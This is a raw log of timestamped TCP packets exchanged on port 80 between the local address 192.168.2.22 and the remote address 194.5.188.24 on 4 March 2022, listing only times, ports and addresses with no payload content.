Mar 4, 2022 15:23:45.165066004 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165067911 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165103912 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165105104 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165133953 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165142059 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165179014 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165180922 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165200949 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165218115 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165222883 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.165277004 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.166518927 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.262861013 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.262903929 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.262944937 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.262983084 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263021946 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263057947 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263070107 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263098955 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263108969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263114929 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263119936 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263134956 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263156891 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263175011 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263206959 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263228893 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263245106 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263267994 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263288975 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263310909 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263331890 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.263354063 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263366938 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263371944 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263427973 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263505936 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263514042 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263519049 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.263524055 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264117956 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264724970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264760017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264781952 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264810085 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264822006 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264828920 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264847994 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264909029 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264909983 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.264935017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264956951 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.264978886 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265002966 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265024900 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265027046 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265048981 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265070915 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265090942 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265114069 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265115023 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265124083 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265147924 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265168905 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265171051 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265175104 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265193939 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265211105 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265335083 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265341043 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265346050 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265350103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265353918 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265384912 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265681028 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265820980 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265844107 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265866041 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265889883 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.265918970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265938997 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.265980959 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266005039 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266026974 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266048908 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266071081 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266093016 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266115904 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266136885 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266158104 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266187906 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266195059 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.266197920 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266264915 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266271114 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266275883 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266279936 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266283989 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266343117 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266382933 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266390085 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.266477108 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.362569094 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362595081 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362617970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362634897 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362656116 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362672091 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362694979 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362718105 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362739086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362761974 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362783909 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362806082 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362829924 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362852097 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362873077 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362895966 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.362929106 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.362993956 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363003016 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363007069 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363012075 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363090038 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363106012 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363111019 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363115072 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363120079 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363125086 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363128901 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363238096 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363245964 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.363617897 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364156008 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364207983 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364243031 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364264011 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364665985 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364725113 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364729881 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364756107 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364778042 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364828110 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364829063 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364850998 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364893913 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364901066 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364905119 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364909887 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.364916086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364938021 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.364979029 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365001917 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365005970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365086079 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365089893 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365112066 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365133047 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365154982 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365178108 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365197897 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365220070 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365240097 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365245104 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365264893 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365345001 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365353107 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365358114 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365359068 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365362883 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365381956 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365406036 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365426064 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365430117 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365449905 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365533113 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365569115 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365576029 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365580082 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365585089 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365588903 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365592957 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365597963 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365602016 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365606070 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365781069 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365803957 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365827084 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365849018 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365871906 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365895033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.365925074 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365943909 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365951061 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365957022 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.365962029 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.366007090 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.366055965 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.366945028 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462372065 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462434053 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462467909 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462476969 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462502956 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462521076 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462543964 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462584019 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462593079 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462624073 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462639093 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462663889 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462672949 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462702036 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462718964 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462743998 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462749958 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462783098 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462794065 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462821007 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462835073 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462861061 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462868929 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462898970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462915897 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462938070 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462954044 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.462977886 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.462989092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463016033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463022947 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463054895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463093042 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463093042 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463102102 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463107109 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463129997 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463138103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463167906 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463184118 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463207006 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463237047 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463247061 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463253975 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463285923 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463289976 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463324070 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463362932 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463363886 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463375092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463396072 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463402033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463419914 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463439941 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463452101 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463481903 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463516951 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463521004 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463537931 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463561058 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463565111 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463601112 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463634014 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463637114 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463650942 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463658094 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463675022 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463702917 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463716030 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463717937 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463754892 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463772058 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463795900 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463819981 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463835001 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463841915 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463876009 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463890076 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463917971 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463917971 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463928938 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463956118 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.463982105 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.463999033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464001894 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464039087 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464056969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464076996 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464087963 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464117050 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464132071 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464143991 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464155912 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464164019 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464209080 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464219093 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464258909 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464267969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464298010 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464315891 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464335918 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464344025 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464375973 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464387894 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464413881 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464432001 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464443922 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464452028 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464458942 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464490891 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464504004 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464530945 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464549065 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464570045 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464580059 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464608908 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464622974 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464646101 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464663029 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464685917 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464709997 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464726925 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464732885 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464765072 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464782000 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464806080 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464826107 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464845896 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464874983 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464884996 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464899063 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464920044 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464926958 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464934111 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.464965105 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.464981079 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465020895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.465039968 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.465063095 CET	80	49166	194.5.188.24	192.168.2.22
